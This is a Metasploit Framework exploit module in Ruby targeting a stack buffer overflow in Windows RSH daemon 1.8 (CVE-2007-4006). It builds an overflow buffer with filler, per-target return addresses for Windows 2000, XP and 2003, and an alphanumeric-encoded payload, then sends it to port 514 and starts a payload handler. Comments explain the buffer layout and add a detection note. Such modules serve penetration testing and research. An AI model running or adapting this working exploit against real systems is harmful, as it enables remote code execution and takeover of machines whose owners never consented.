### $Id: windows_rsh.rb 9179 2010-04-30 08:40:19Z jduck $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/##
require 'msf/core'

# Remote exploit module for the Windows RSH daemon 1.8 buffer overflow
# (CVE-2007-4006 / OSVDB 38572 / BID 25044). The module is a single
# TCP write to 514/tcp: a short rcmd-style preamble, 1024 bytes of
# filler, a per-target return address and the encoded payload.
class Metasploit3 < Msf::Exploit::Remote

	# Framework reliability ranking; the hard-coded 'Ret' addresses below
	# make success depend on an exact OS / service pack / language match.
	Rank = AverageRanking

	# Provides connect/disconnect, `sock`, and the RPORT/CPORT options.
	include Msf::Exploit::Remote::Tcp

	# Registers module metadata, payload constraints and target table.
	# @param info [Hash] module info merged by update_info
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Windows RSH daemon Buffer Overflow',
			'Description'    => %q{
This module exploits a vulnerabliltiy in Windows RSH daemon 1.8.
The vulnerability is due to a failure to check for the length of input sent
to the RSH server. A CPORT of 512 -> 1023 must be configured for the exploit
to be successful.},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					['CVE', '2007-4006'],
					['OSVDB', '38572'],
					['BID', '25044'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					# Up to 850 bytes are sent after the return address (see #exploit).
					'Space'          => 850,
					'BadChars'       => "\x00",
					# x86 stub placed before the decoder: add esp,-0x1001 / inc esp,
					# i.e. ESP is moved 0x1000 bytes down first — presumably so the
					# decoder's stack writes do not land on the payload; confirm.
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
					# Payload is emitted as uppercase alphanumerics only.
					'EncoderType'    => Msf::Encoder::Type::AlphanumUpper,
				},
			'Platform'       => 'win',
			# Each target is one fixed return address (little-endian, see pack('V')
			# in #exploit). Addresses are specific to the listed OS/SP/language.
			'Targets'        =>
				[
					['Windows 2003 SP1 English',   { 'Ret' => 0x77409dbb }],
					['Windows XP Pro SP2 English', { 'Ret' => 0x7e497c7b }],
					['Windows 2000 Pro SP4 English', { 'Ret' => 0x77f81be3 }],
				],
			'Privileged'     => true,
			'DisclosureDate' => 'Jul 24 2007',
			'DefaultTarget'  => 0))

		# rsh/shell listens on 514/tcp. The daemon also expects a privileged
		# client source port (512-1023), hence the CPORT note in Description.
		register_options([Opt::RPORT(514)], self.class)
	end

	# Builds and sends the overflow buffer, then hands off to the payload
	# handler. Buffer layout, in order:
	#   "\x00" + 1 char + "\x00" + 1 char + "\x00"  — NUL-separated preamble;
	#       looks like the rcmd port/user fields — TODO confirm against the
	#       daemon's request parsing
	#   1024 bytes of random English text         — filler up to the saved
	#       return address (offset inferred from the length, not shown here)
	#   target.ret packed as 32-bit little-endian  — overwrites the return address
	#   payload.encoded                            — up to 'Space' (850) bytes,
	#       uppercase-alphanumeric encoded
	# From a detection standpoint this is one write on 514/tcp that is far
	# longer than any legitimate rcmd preamble (>1 KiB of printable text
	# followed by a non-printable 4-byte address).
	def exploit
		connect

		sploit =  (("\x00" + rand_text_english(1)) * 2) + "\x00"
		sploit << rand_text_english(1024) + [target.ret].pack('V')
		sploit << payload.encoded

		print_status("Trying target #{target.name}...")
		sock.put(sploit)

		# Starts the payload handler (bind/reverse per the chosen payload).
		handler
		disconnect
	end

end